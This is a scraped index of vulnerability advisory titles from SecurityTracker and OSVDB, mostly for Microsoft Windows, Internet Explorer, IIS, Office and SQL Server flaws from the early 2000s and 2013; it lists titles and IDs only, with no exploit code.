ActiveX Control Has 'ResDLL' Parameter Buffer Overflow That Lets Remote Users Execute Arbitrary Code [1004250] Microsoft MSN Messenger Includes an ActiveX Control That Has 'ResDLL' Parameter Buffer Overflow That Lets Remote Users Execute Arbitrary Code [1004249] Microsoft MSN Chat Control ActiveX Control Has 'ResDLL' Parameter Buffer Overflow That Lets Remote Users Execute Arbitrary Code [1004229] Microsoft Office 'Word Mail Merge' Feature Allows Remote Users to Cause Arbitrary Programs to Be Executed on the Target User's Computer [1004226] Microsoft MSN Messenger Instant Messaging Client Malformed Header Processing Flaw Lets Remote Users Crash the Client [1004197] Microsoft Internet Explorer Can Be Crashed By Incorrectly Sized XBM Graphics Files [1004157] Microsoft Outlook Weak Security Enforcement When Editing Messages with Microsoft Word Lets Remote Users Send Malicious Code to Outlook Recipients That Will Be Executed When Forwarded or Replied To [1004146] Microsoft Internet Explorer Browser Can Be Crashed By Remote HTML Containing Malicious Image Tags That Cause Infinite Processing Loops [1004130] Microsoft MSN Messenger Instant Messaging Client Discloses Buddy List to Local Users [1004121] Microsoft Internet Explorer Web Browser Can Be Crashed By Remote Users With OLE OBJECT Element Dependency Loops [1004109] Microsoft Distributed Transaction Coordinator Can Be Crashed By Remote Users Sending Malformed Packets [1004090] Microsoft Back Office Web Administration Authentication Mechanism Can Be Bypassed By Remote Users [1004079] Microsoft Internet Explorer (IE) 'dialogArguments' Flaw Lets Remote Users Conduct Cross-Site Scripting Attacks Against IE Users [1004051] Microsoft Outlook Express for Mac OS Has Buffer Overflow in Processing the 'file://' URL That Allows Remote Users to Cause Arbitrary Code to Be Executed [1004050] Microsoft Office for Mac OS Has Buffer Overflow in Processing the 'file://' URL That Allows Remote Users to Cause Arbitrary Code to Be Executed [1004049] Microsoft Internet Explorer for Mac OS Has Buffer Overflow in Processing the 'file://' URL That Allows Remote Users to Cause Arbitrary Code to Be Executed [1004048] Microsoft Word Object Creation Flaw Lets Remote Users Create ActiveX That Will Consume Memory on the Victim's Computer [1004044] Cisco CallManager Affected by Microsoft Internet Information Server (IIS) Bugs [1004032] Microsoft Internet Information Server (IIS) FTP STAT Command Bug Lets Remote Users Crash Both the FTP and the Web Services [1004031] Microsoft Internet Information Server (IIS) URL Length Bug Lets Remote Users Crash the Web Service [1004014] Microsoft Internet Information Server ASP HTTP Header Processing Buffer Overflow Lets Remote Users Execute Arbitrary Code on the Server [1004011] Microsoft Internet Information Server (IIS) Buffer Overflow in ASP Server-Side Include Function May Let Remote Users Execute Arbitrary Code on the Web Server [1004008] Microsoft Internet Information Server Comes With Code That Allows Remote Users to Conduct Cross-Site Scripting Attacks [1004006] Microsoft Internet Information Server (IIS) Off-By-One Heap Overflow in .HTR Processing May Let Remote Users Execute Arbitrary Code on the Server [1004005] Microsoft Internet Information Server Buffer Overflow in Chunked Encoding Mechanism Lets Remote Users Run Arbitrary Code on the Server [1004002] Microsoft Office Web Components Let Remote Users Determine if Specified Files Exist on Another User's Host [1004001] Microsoft Office Web Components Let Remote Users Gain Full Read and Write Control Over Another User's Clipboard, Even if Clipboard Access Via Scripts is Disabled [1004000] Microsoft Office Web Components Let Remote Users Write Code to Run in the Victim's Local Security Domain and Access Local or Remote Files [1003999] Microsoft Office Web Components in Office XP Lets Remote Users Cause Malicious Scripting to Be Executed By Another User's Browser Even If Scripting is Disabled [1003948] Microsoft Internet Explorer Cascading Style Sheets (CSS) Invalid Attribute Bug Lets Remote Users Read Portions of Files on the Victim's Computer [1003932] Microsoft Office XP Active Content Bug Lets Remote Users Cause Code to Be Executed on an Office User's Computer [1003922] Microsoft Outlook Web Access With SecurID Authentication May Allow Remote Users to Avoid the SecurID Authentication in Certain Cases [1003915] Microsoft Internet Explorer Browser Security Zone Flaw Lets Remote Users Cause Cookie-based Scripts to Be Executed on Another User's Browser in the Incorrect Security Domain [1003907] Microsoft Internet Explorer Discloses The Existence of and Details of Local Files to Remote Users [1003874] Apache Web Server for Windows Has Batch File Processing Hole That Lets Remote Users Execute Commands on the System [1003871] Microsoft .NET Unspecified Vulnerabilities May Allow a Remote User to Cause Arbitrary Code to Be Executed on Another User's Systems [1003856] Microsoft Internet Explorer Can Be Crashed By Malicious 'location.replace' Javascript [1003839] Microsoft Internet Explorer (IE) 6 Lets Remote Users Cause Files to Be Downloaded and Executed Without the Knowledge or Consent of the Victim [1003830] Windows NT and 2000 Session Manager Debug Hole Lets Local Users Obtain Handles to Any Process or Thread to Obtain Elevated Privileges on the System [1003800] A Multitude of Microsoft SQL Server Extended Stored Procedures Have Buffer Overflows That Allow Remote Users to Crash the Database Server or Execute Arbitrary Code on the Server to Gain Full Control of the System [1003756] Microsoft Internet Information Server 4.0 .HTR Web Application Lets Users Change Their Passwords When the NT Security Policy is Configured to Prohibit Password Changing [1003744] Microsoft SQL Server 'xp_dirtree' Buffer Overflow Lets Users Crash the Database Service [1003738] Norton Anti-Virus Corporate Edition Default Configuration for Windows 2000 Lets 'Power Users' Obtain Elevated 'Administrator' Privileges [1003730] Microsoft Java Virtual Machine in Internet Explorer Lets Remote Malicious Applets Redirect Web Proxy Connections [1003688] Microsoft Exchange Server 2000 Command Processing Bug Lets Remote Users Cause the SMTP Service to Crash [1003685] Microsoft Exchange Server Lets Remote Users Send or Relay Unauthorized Mail (including SPAM) Via the Server [1003660] Windows Media Player Executes URLs in Windows Media Files that Have Been Renamed as MP3 Files [1003634] Microsoft XML Core Services in SQL Server 2000 Lets Remote Scripts Access and Send Local Files [1003630] Microsoft Internet Explorer Has Another Frame Domain Security Bug That Lets Remote Users View Files or Other Personal Information from a Victim's Computer By Using Malicious VBScripts [1003629] Microsoft Commerce Server 2000 AuthFilter Buffer Overflow Lets Remote Users Execute Arbitrary Code on the Server With LocalSystem Privileges to Gain Full Control of the Server [1003611] Gator Plugin for Microsoft Internet Explorer Lets Remote Users Install Arbitrary Software on the User's Host [1003605] Microsoft SQL Server Buffer Overflow Lets Remote Users Crash the Server and May Allow Remote Code to Be Executed on the Database Server [1003597] Microsoft Outlook Web Access Discloses 'Include' Archive Files in the 'lib' Directory to Remote Users [1003589] Windows XP Networking Port May Allow Remote Users to Deny Service By Sending a Stream of TCP SYN Packets [1003582] Microsoft Internet Security Acceleration Server Can Be Affected By Remote Users Conducting a LAND Flood Attack [1003556] Microsoft Visual C++ Compiler Buffer Security Mode Does Not Eliminate Buffer Overflows in Compiled Applications [1003546] Microsoft Outlook E-mail Client May Display Potentially Malicious File Attachments Illegally Embedded Within Mail Headers [1003540] Microsoft Internet Explorer Browser MIME Flaw Causes 'text/plain' Pages to Be Displayed as HTML and Any Embedded Scripting to Be Executed By the Browser [1003519] Microsoft Internet Explorer (IE) HTML Directive Buffer Overflow Lets Remote Users Cause Arbitrary Code to Be Executed on Another User's Computer [1003517] Microsoft Internet Explorer (IE) 'Content-Type' Processing Hole Lets Remote Users Open Applications on Another User's Computer [1003516] Microsoft Internet Explorer (IE) Web Browser Has New Frame Domain Verification Bug That Lets Remote Users Obtain Files from Another User's Local File System [1003469] Microsoft Exchange 2000 Server Allows Remote Users to View and Possibly Modify Registry Settings [1003464] PHP for Windows Discloses Path Information to Remote Users [1003462] Microsoft Internet Explorer Web Browser Allows Cross-site Scripting Attacks Via Non-HTTP Servers [1003458] Microsoft Office v. X for Mac OS X Can Be Crashed By Remote Users Sending Malformed Product Identification Packets [1003446] Microsoft Internet Information Server Can Be Stopped By Local Users Removing Virtual Directories in a Shared Hosting Environment [1003436] Windows Messenger (aka MSN Messenger) Instant Messaging Client Discloses Display Name and Contacts to Remote Users [1003434] Microsoft ASP.NET Web Application Framework Allows Cross Site Scritping Attacks and Discloses Path Information to Remote Users [1003433] BlackICE Defender Firewall for Windows Can Be Crashed By Remote Users Sending Large Ping Packets [1003429] mIRC Internet Relay Chat (IRC) Windows Client Buffer Overflow Lets Malicious IRC Servers Execute Arbitrary Code on the Client and Take Full Control of the Client's Host [1003420] Microsoft Site Server Commerce Edition Discloses Potentially Sensitive Administration Information and Source Code to Remote Users With Valid Accounts and Discloses User Passwords from the LDAP Directory to Anonymous Remote Users [1003419] Microsoft Site Server Commerce Edition Lets Remote Users With Valid NT Accounts Upload and Then Execute ASP Scripts on the Server or Consume Disk Space on the Server [1003415] Microsoft Distributed Transaction Coordinator (MSDTC) Service Can Be Crashed By Remote Users [1003382] Windows 2000 TCP Stack Bug Lets Remote Users Cause All Memory to Be Consumed on the Server [1003326] Microsoft Internet Explorer for Macintosh OS Executes Remotely Supplied Commands in AppleScripts [1003224] Microsoft Internet Information Server (IIS) Version 4 Lets Local Users Modify the Log File Undetected [1003215] Microsoft Internet Explorer Popup Object Tag Flaw Lets Remote Users Execute Programs on the Browser's Host [1003135] Microsoft Internet Explorer Can Be Crashed By Remote Users With Javascript That Calls an Endless Loop of Modeless Dialogs [1003129] AOLserver for Windows Discloses Password-Protected Files to Remote Users [1003125] Hosting Controller Windows-based Web Hosting Management Software Lets Remote Users Establish Administrator Accounts and Upload and Execute Arbitrary Code on the Server [1003109] Microsoft Internet Explorer (IE) May Allow Malicious Javascript to Poll a User's System for Known Files [1003104] PHP.EXE Windows CGI for Apache Web Server May Let Remote Users View Files on the Server Due to Configuration Error [1003084] Microsoft Internet Explorer GetObject() Active Scripting Bug Lets Remote Code Access Files on the PC [1003075] ActivePerl for Windows Discloses Directory Path Location to Remote Users [1003050] Microsoft Internet Explorer Web Browser Can Be Crashed By Malicious Image Source Tag Javascript Supplied By Remote Users [1003049] Microsoft Internet Explorer (IE) Text Form Processing Flaw May Cause IE to Crash [1003043] PGP Plug-in For Microsoft Outlook May Fail to Encrypt E-mail in Certain Situations [1003042] Microsoft Internet Explorer Web Browser SSL Security Flaw Lets Remote Users Conduct Man-in-the-Middle Attacks to Access Sensitive Information [1003040] Microsoft Excel Password Protection Flaw Lets Local Users Obtain Contents of Password-Protect Cells [1003033] Microsoft C Runtime Format String Flaw Lets Remote Users Crash the Microsoft SQL Server Service [1003032] Microsoft SQL Server Buffer Overflow Lets Remote Users Execute Arbitrary Code in the Security Context of the SQL Server [1003024] Microsoft Internet Explorer (IE) Web Browser 'document.open()' Scripting Flaw Lets Remote Users Steal Cookies, Read Local Files, and Spoof Web Sites [1002986] Microsoft Internet Explorer Version 6 Lets Remote Scripts Access and Send Local Files [1002973] Microsoft Internet Explorer (IE 6) Browser May Automatically and Silently Execute Arbitrary Code from a Remote Web Site When the User Views a Web Page or HTML-based E-mail [1002968] Citrix ICA Client for Windows Allows Remote Malicious Code to Execute on a User's PC Without Warning [1002957] Microsoft Internet Information Server Can Be Crashed By Remote Users With HTTP Requests Containing Invalid Content-Length Values [1002942] Microsoft Internet Explorer May Execute Javascript Contained Within an 'About:' URL in an Unauthorized Security Domain When the URL Contains an Extraneous '%' Character [1002935] X Windows Temporary File Symlink Error Lets Local Users Deny Service By Overwriting Sensitive Root-Owned Files [1002919] Microsoft Internet Explorer Browser Can Be Crashed By Certain Image Tags [1002915] Microsoft Outlook Web Access for Exchange May Execute Remotely Supplied Scripts When a Recipient Views a Malicious E-mail Message [1002905] Xtel MINITEL Emulator for X Windows Has Symlink Vulnerability That Could Let Local Users Obtain Elevated Privileges [1002885] Microsoft Internet Explorer Can Be Crashed By Malicious Javascript Causing a Stack Overflow in setTimeout() Function [1002823] Microsoft Internet Explorer Fails to Enforce Cookie Prompting Preferences for Local Security Zone [1002820] Microsoft Internet Explorer Allows Malicious Web Pages to Spoof Downloadable File Types And Execute Code on the User's Computer When Opened Directly from the Browser [1002819] Microsoft Internet Explorer ActiveX Flaw Permits Remote Malicious HTML Code Containing an 'htmlfile' or 'htmlfile_FullWindowEmbed' Object to Access Local Files and Potentially Execute Commands [1002802] Microsoft Help and Support Center Software (helpctr.exe) Has Buffer Overflow That May Allow a Remote User to Cause Arbitrary Code to Be Executed on a User's PC [1002778] Microsoft Internet Information Server (IIS) Lets Remote Users Create Bogus Web Log Entries [1002775] Windows Media Player Buffer Overflow in ASF File Processing Lets Malicious Media Files Execute Arbitrary Code on a User's PC [1002772] Microsoft Internet Explorer Cookie Disclosure Fix Discloses Patch Information to Remote Users [1002733] Microsoft IIS 4.0 Configuration Error May Allow Remote Users to Obtain Physical Directory Path Information [1002728] Microsoft SQL Server May Disclose Database Passwords When Creating Data Transformation Service (DTS) Packages [1002702] Microsoft Passport May Disclose Wallet Contents, Including Credit Card and Contact Information, to Remote Users [1002693] Microsoft Internet Security and Acceleration Server UDP Fragmentation Processing Can Cause 100% of CPU Resources to Be Consumed [1002665] Compaq's DECwindows Motif Server for OpenVMS Allows Local Users to Gain Unauthorized Access to Data and System Resources [1002651] Microsoft Internet Information Server (IIS) May Disclose PHP Scripting Source Code [1002641] RSA SecurID ACE/Agent Software for Windows Can Be Forced into Debug Mode By Remote Users Without Authentication, Potentially Disclosing Information to Remote Users When Certain Programs Crash [1002626] Macintosh Cients Using Windows 2000 NTFS Volumes May Modify Directory Permissions in Certain Cases [1002595] Microsoft Internet Explorer Has Fixed Security Zone for about: URLs and Has Shared Cookie Flaw That Diminishes Cross-Site Scripting Protections [1002594] Microsoft Internet Explorer for Mac OS X is Configured to Automatically Execute Downloaded Files [1002581] Microsoft Terminal Servers Can Be Crashed By Remote Users Sending Certain Remote Desktop Protocol (RDP) Packets [1002560] Internet Explorer Sends Potentially Sensitive Web Browser Contents to Microsoft via the Network When an Error Occurs [1002559] Microsoft Office XP Sends Potentially Sensitive Information to Microsoft Via the Network When an Error Occurs [1002526] Microsoft Internet Explorer (IE) Web Browser Has Multiple URL-related Flaws That May Allow for Remote Code Execution, Remote HTTP Request Generation, and Application of Incorrect Security Restrictions [1002487] Microsoft PowerPoint Macro Security Features Can Be Bypassed by Malformed PowerPoint Documents [1002486] Microsoft Excel Macro Security Features Can Be Bypassed by Malformed Excel Documents [1002456] Microsoft Outlook Web Access Directory Validation Flaw Lets Remote Users Consume CPU Resources by Requesting Mail from Nested Folders [1002421] Microsoft Index Server Sample File Discloses File Information to Remote Users [1002413] Microsoft Outlook Express Will Execute Active Scripting in Plain Text E-mail Messages, Circumventing Some Scripting Controls [1002385] Norton Anti-Virus For Microsoft Exchange Discloses User Path Information to Remote Users [1002356] Microsoft Outlook 2000 Animated Assistant Prevents the Screen Saver from Activating, Allowing Physically Local Users to Access the System [1002331] Internet Security Systems RealSecure Intrusion Detection Misses '%u' Encoded Attacks Against Microsoft Web Servers [1002330] Cisco Catalyst 6000 Intrusion Detection System Module Fails to Detect '%u' Encoding Obfuscation Attacks Against Microsoft Web Servers [1002329] Dragon Sensor Intrusion Detection System Does Not Detect Certain Attacks Against Microsoft Web Servers [1002327] Snort Network Intrusion Detection System Will Not Detect '%u' URL Encoding Attacks Against Microsoft Web Servers [1002326] Cisco Secure Intrusion Detection System (NetRanger) Fails to Detect Certain Attacks Against Microsoft Web Servers [1002317] Microsoft DNS Server Software Susceptible to DNS Cache Poisoning in Default Configuration, Allowing Remote Users to Inject False DNS Records in Certain Situations [1002269] Microsoft Outlook Web Access with SSL Can Be Crashed by Remote Users [1002225] Windows 2000 IrDA Infrared Device Driver Lets Infrared Users Crash the System [1002212] Microsoft IIS Web Server Contains Multiple Vulnerabilities That Allow Local Users to Gain System Privileges and Allow Remote Users to Cause the Web Server to Crash [1002206] Microsoft Internet Security and Acceleration (ISA) Server 2000 Can Be Disrupted By Remote Users Due to Memory Leaks and Also Allows Cross-Site Scripting Attacks [1002183] The Matrix Screen Saver for Windows Lets Physically Local Users Bypass the Password Mechanism and Access the System [1002161] Microsoft Internet Information Server (IIS) Web Server Discloses Internal IP Addresses or NetBIOS Host Names to Remote Users [1002159] Windows Media Player ASF Marker Table Overflow Lets Remote Users Crash the Player in Certain Situations [1002134] Identix BioLogon Client for Windows Fails to Secure Screen Saver Logins in Certain Multi-monitor Configurations, Allowing Physically Local Users to Access the System Without Requiring Biometric Authentication [1002105] Microsoft SQL Database Server RPC Input Validation Failure Lets Remote Users Crash the Database Service [1002104] Microsoft Exchange Server RPC Input Validation Failure Lets Remote Users Crash the Exchange Service [1002089] SnapStream Personal Video System for Windows Lets Remote Users Obtain Files on the System, Including One Containing Unencrypted SnapStream Passwords [1002088] Windows Media Player Allows Malicious Media Files to Execute Arbitrary Code on the Player's Host [1002075] Microsoft Services for Unix Memory Leak in Telnet and NFS Services Allows Remote Users to Crash the Operating System [1002048] Windows 2000 May Disclose Descriptive Information To Local Users Attempting Password Guessing with the NetUserChangePassword API [1002028] Microsoft Exchange LDAP Service Can Be Crashed By Remote Users [1002006] Cygwin Tar File Archive Extraction Utility Lets Malicious Tar Files Write to Windows Devices When Extracted [1002005] UnZip Lets Malicious Tar Files Write to Windows Devices When Extracted [1002004] RAR File Archive Extraction Utility Lets Malicious Archives Write to Some Windows Devices on Extraction [1002003] PKZIP Lets Malicious Zip Files Write to Windows Devices When Unzipping Zip Files [1002002] WinZip Utility Lets Malicious Zip Files Write to Windows Devices on Extraction [1001984] Microsoft Outlook Allows Rogue HTML to Execute Arbitrary Commands on the User's Host [1001971] IBM DB2 Database Software for Windows Can Be Crashed By Remote Users [1001923] Microsoft's Internet Information Server's ASP Processor Can Be Crashed by Remote Users in Certain Situations [1001904] vWebServer for Windows Discloses ASP Source Code to Remote Users and Can Be Crashed Remotely [1001819] Microsoft NetMeeting Can Be Crashed By Remote Users [1001818] Microsoft Internet Information Server (IIS) Web Server Discloses ASP Source Code When Installed on FAT-based Filesystem [1001816] Microsoft Visual Studio RAD Support Component of FrontPage Lets Remote Users Execute Arbitrary Code on the FrontPage Server [1001815] Microsoft Word May Execute Macros in Malformed Word Documents Without Warning Even if Macros are Disabled [1001778] Cisco TFTP Server for Windows Discloses Any File on the System to Remote Users [1001775] Microsoft Index Server Lets Remote Users Execute Arbitrary Code With System Level Privileges, Giving Remote Users Full Control of the Operating System [1001763] Rxvt X-Windows Terminal Emulator Lets Local Users Obtain utmp Group Privileges [1001734] Microsoft SQL Server May Let Remote Authenticated Users Take Full Control of the Database Server and the Underlying Operating System [1001727] TrendMicro's InterScan VirusWall for Windows NT Allows Remote Users to Modify the Configuration Without Authentication [1001699] Microsoft Internet Explorer Web Browser May Allow Remote Users to Read Some Text Files on the Browser's Hard Drive [1001696] Microsoft Exchange Server's Outlook Web Access (OWA) Lets Remote Users Execute Arbitrary Code on the OWA User's Web Browser [1001687] Microsoft Outlook Express May Allow A Remote User to Obtain E-mail Destined for a Different User [1001673] Pragma InterAccess Telnet Server for Windows 95/98 Lets Remote Users Crash the Server [1001661] Microsoft Hotmail May Allow a Worm to Send Mail to Other Destinations Listed in a Remote User's Inbox [1001610] HyperTerminal Telnet Client for Windows Allows Local Users to Cause Arbitrary Code to be Executed by the Client [1001576] eEye Digital Security's SecureIIS Application Firewall for Microsoft Web Servers Fails to Filter Certain Web URL Characters, Allowing Remote Users to Bypass the SecureIIS Firewall [1001562] Microsoft Internet Explorer Allows Remote Web Sites to Cause a Different Web URL Address to Be Displayed in the Browser's Address Bar, Allowing Rogue Web Sites to Spoof the Browser and Masquerade as Different Web Sites [1001561] Microsoft Internet Explorer Web Browser Fails To Validate Digital Certificates in Some Configurations, Allowing Rogue Secure Web Sites to Spoof the Browser and Masquerade as a Different Secure Web Site [1001538] Older Version of Microsoft Internet Explorer Web Browser Can Be Crashed By Remote Users [1001537] Microsoft's Internet Information Server's FTP Services May Give Remote Users Information About User Account Names on the Server's Domain and Trusted Domains [1001535] Microsoft's Internet Information Server's FTP Services Can Be Crashed By Remote Users [1001530] Microsoft IIS Web Server Allows Remote Users to Execute Commands on the Server Due to CGI Decoding Error [1001525] Earlier Version of LiteServe Web Server for Windows Can Be Crashed By Remote Users [1001517] Denicomp Systems REXECD Remote Exec Server for Windows Can Be Crashed By Remote Users [1001516] Denicomp Systems RSHD Remote Shell Server for Windows Can Be Crashed By Remote Users [1001512] Microsoft Index Server for NT Can Be Crashed By Local Users, Allows Local Users to Execute Arbitrary Code With System Level Privileges, and Lets Remote Users View Certain Include Files [1001483] Microsoft IIS Web Server Lets Remote Users Restart the Web Server with Another Specially Crafted PROPFIND XML Command [1001445] Microsoft Internet Security and Acceleration Server May Allow Remote Users to Execute Arbitrary Code on the Firewall [1001424] Microsoft Internet Explorer Can Consume All Memory Due to Malicious HTML Code [1001407] WFTPD Pro FTP Server for Windows Allows Remote Users to Crash the Server [Vendor Vigorously Disputes This Claim] [1001402] Microsoft IIS Web Server Can Be Effectively Shutdown By Certain Internal-Network Attacks When The Underlying OS Supports User Account Lockouts [1001396] mIRC Internet Relay Chat Client for Windows Allows Remote Users to Control Other Users' Clients [1001380] Microsoft Internet Explorer and Outlook Express May Execute Arbitrary Code Without User Authorization or Intervention [1001344] Microsoft Internet Explorer May Not Display File Extensions in Certain Cases [1001330] Microsoft ActiveSync Software for Portable Computing Devices Allows Portable Devices to Access Files on a Locked Server [1001319] Microsoft Internet Security and Acceleration Server Can Be Crashed By Remote Users [1001311] Netscape's SmartDownload Can Automatically Execute Arbitrary Code Without User Intervention or Knowledge for Both Netscape and Microsoft Browsers [1001304] Apache Web Server for Windows Lets Remote Users Crash the Web Server Application [1001272] PGP Encryption Software for Windows May Allow Arbitrary Files to Be Created That May Lead to Arbitrary Code Execution [1001255] Microsoft's Ping.exe Allows Local Users to Cause Certain Applications to Crash [1001221] E-Mail Clients that use Microsoft Internet Explorer to Process HTML May Disguise Executable Attachments as Data Files [1001219] Microsoft's Internet Security and Acceleration Server Performance Can Be Significantly Affected By Remote Users Under Certain Configurations [1001216] Microsoft Internet Explorer Can Be Made to Execute Arbitrary Files on the User's Computer [1001213] Tomcat Java Server for Windows Allows Remote Users to List Files Outside of the Server's Root Directory [1001211] TrendMicro's ScanMail E-Mail Virus Scanner for Microsoft Exchange Discloses Administrative System Usernames and Passwords [1001210] Microsoft Internet Explorer Allows Malicious Web Pages to Retrieve Files from the User's Computer [1001209] Microsoft Telnet Can Be Crashed Locally, Causing Other Applications Including Outlook Express To Crash [1001197] Microsoft Internet Explorer May Automatically Execute Certain E-mail Attachments [1001187] Microsoft Internet Explorer Is Vulnerable to Malicious Web Pages That May Obtain the User's Exchange E-mail Messages and May Access Restricted Web Server Directory Listings [1001172] Microsoft Visual Studio Could Allow Users to Crash the Debugger or to Execute Code on the Server [1001163] Microsoft's Dr. Watson Diagnostic Utility May Reveal Passwords and Other Sensitive Information [1001147] Microsoft Outlook Express Crashes When Reading Certain E-mail Messages [1001142] Microsoft Internet Explorer Does Not Check for Revoked Digital Certificates (Two Fraudlent Certificates Are Known to Exist) [1001139] SurfControl for Microsoft Proxy Server May Fail to Block Sites [1001123] Microsoft's FTP Server May Allow Remote Users to Deny Service on the Server [1001116] Microsoft Personal Web Server Contains An Old Internet Information Server (IIS) Vulnerability Allowing Unauthorized Directory Listings and Possible Code Execution For Remote Users [1001088] Microsoft Internet Explorer with Services for Unix 2.0 Can Create Malicious Files on the User's Host [1001087] SSH's Secure Shell for Windows 2.4 Can Be Crashed By Remote Users [1001050] Microsoft IIS 5.0 Web Server Can Be Restarted Remotely By Any User [1000989] Fastream Technologies FTP++ Server for Windows Gives Access to Files and Directories Outside the Server's Main Directory [1000988] TranSoft's Broker FTP Server for Windows Allows File and Directory Access and FTP Command Execution Outside of the Server's Root Directory [1000987] Texas Imperial Software's WFTPD Pro FTP Server for Windows NT/2000 May Execute Arbitrary Code and Can Be Crashed Remotely [1000986] SunFTP (A Windows-Based FTP Server) Allows Read and Write Access to Files and Directories Outside of the Server's Root Directory [1000945] BadBlue's Windows-Based Web Server Can Be Crashed Via the Network and May Display Full Path Names [1000940] Windows 2000's WINMM.DLL Can Locally Crash WINLOGIN.EXE OSVDB - http://www.osvdb.org: [96197] Microsoft Windows TCP/IP Stack Crafted ICMPv6 Packet Handling Remote DoS [96195] Microsoft Windows NAT Driver Crafted ICMP Packet Handling Remote Memory Corruption DoS [96194] Microsoft Windows Asynchronous RPC Request Handling Remote Code Execution [96193] Microsoft Windows Unicode Scripts Processor (USP10.DLL) Uniscribe Font Parsing Engine Unspecified Memory Corruption [96180] Microsoft Windows Kernel Address Value Handling Unspecified Local Memory Corruption (2013-3196) [96179] Microsoft Windows Kernel Address Value Handling Unspecified Local Memory Corruption (2013-3197) [96178] Microsoft Windows Kernel Address Value Handling Unspecified Local Memory Corruption (2013-3198) [95667] Microsoft Windows XP Wireless Preferred Network List (PNL) Remote Disclosure [95589] Microsoft Windows Mobile Wireless Preferred Network List (PNL) Remote Disclosure [94987] Microsoft Windows Defender Improper Pathname Handling Local Privilege Escalation [94986] Microsoft Windows Media Format Runtime Media File Handling Arbitrary Code Execution [94985] Microsoft Windows DirectShow GIF File Handling Memory Overwrite Arbitrary Code Execution [94966] Microsoft Windows win32k.sys Memory Object Dereference Handling Local Privilege Escalation [94965] Microsoft Windows win32k.sys Memory Object Allocation Handling Local Privilege Escalation [94964] Microsoft Windows win32k.sys Memory Object Handling Local Buffer Overflow [94963] Microsoft Windows win32k.sys Memory Object Handling Local Buffer Overflow DoS [94962] Microsoft Windows win32k.sys Memory Object Handling Local Information Disclosure [94961] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation [94126] Microsoft Windows Print Spooler Printer Deletion Memory Handling Local Privilege Escalation [94125] Microsoft Windows TCP/IP Driver TCP Connection Crafted Packet Handling Remote Integer Overflow DoS [94124] Microsoft Windows Kernel Page Fault System Call Handling Local Information Disclosure [93539] Microsoft Windows win32k.sys EPATHOBJ::pprFlattenRec / EPATHOBJ::bFlatten Functions Local Privilege Escalation [93320] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation [93319] Microsoft Windows win32k.sys Memory Object Handling Local Buffer Overflow [93318] Microsoft Windows DirectX Graphics Kernel Subsystem (dxgkrnl.sys) Memory Object Handling Local Privilege Escalation [93317] Microsoft Windows Essentials Windows Writer Crafted URL Handling Arbitrary File Overwrite [93300] Microsoft Windows HTTP Protocol Stack (HTTP.sys) Crafted HTTP Header Handling Infinite Loop Remote DoS [92133] Microsoft Windows NTFS NULL Pointer Dereference Local Privilege Escalation [92132] Microsoft Windows win32k.sys Unspecified Memory Object Handling Race Condition Local Privilege Escalation (2013-1292) [92131] Microsoft Windows win32k.sys Crafted Font File Handling DoS [92130] Microsoft Windows win32k.sys Unspecified Memory Object Handling Race Condition Local Privilege Escalation (2013-1283) [92127] Microsoft Windows Client/Server Run-time Subsystem (CSRSS) Unspecified Local Memory Corruption [92126] Microsoft Windows Multiple Active Directory Components LDAP Crafted Query Handling Memory Consumption Remote DoS [92125] Microsoft Windows Kernel Unspecified Memory Object Handling Race Condition Local Privilege Escalation (2013-1294) [92124] Microsoft Windows Kernel Unspecified Memory Object Handling Race Condition Local Privilege Escalation (2013-1284) [92122] Microsoft Windows Remote Desktop Client ActiveX (mstscax.dll) Use-after-free Arbitrary Code Execution [91696] Microsoft Windows Modern Mail Unspecified Spoofing Weakness [91269] Microsoft Windows 8 TrueType Font (TTF) Handling Unspecified DoS [91195] Microsoft Windows 7 Unspecified ASLR Protection Mechanism Bypass [91194] Microsoft Windows 7 Kernel Unspecified Local Privilege Escalation (pwn2own) [91193] Microsoft Windows 7 Unspecified ASLR / DEP Protection Mechanism Bypass (pwn2own) [91157] Microsoft Windows USB RNDIS Driver Memory Object Handling Unspecified Local Privilege Escalation (2013-1287) [91156] Microsoft Windows USB RNDIS Driver Memory Object Handling Unspecified Local Privilege Escalation (2013-1286) [91155] Microsoft Windows USB RNDIS Driver Memory Object Handling Unspecified Local Privilege Escalation (2013-1285) [90257] Microsoft Windows Server 2003 ICACLS.EXE Permission Inheritance Weakness [90236] Microsoft Windows ZwSetInformationProcess() Function Process Priority Handling Local DoS [90166] Microsoft Windows Object Linking and Embedding (OLE) Automation Memory Allocation RTF File Handling Arbitrary Code Execution [90165] Microsoft Windows Win32.sys CSRSS Memory Object Handling Local Privilege Escalation [90164] Microsoft Windows TCP/IP Stack Crafted Connection Termination Packet (TCP PIN WAIT) Handling Remote DoS [90163] Microsoft Windows Memory Object Reference Count Handling Local Privilege Escalation [90162] Microsoft Windows Memory Object Handling Local Privilege Escalation (2013-1279) [90161] Microsoft Windows ApphelpCacheLookupEntry Function Memory Object Handling Local Privilege Escalation [90160] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1277) [90159] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1276) [90158] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1275) [90157] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1274) [90156] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1273) [90155] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1272) [90154] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1271) [90153] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1270) [90152] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1269) [90151] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1268) [90150] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1267) [90149] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1266) [90148] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1265) [90147] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1264) [90146] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1263) [90145] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1262) [90144] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1261) [90143] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1260) [90142] Microsoft Windows win32k.sys Memory Object Handling Local Privilege Escalation (2013-1259) 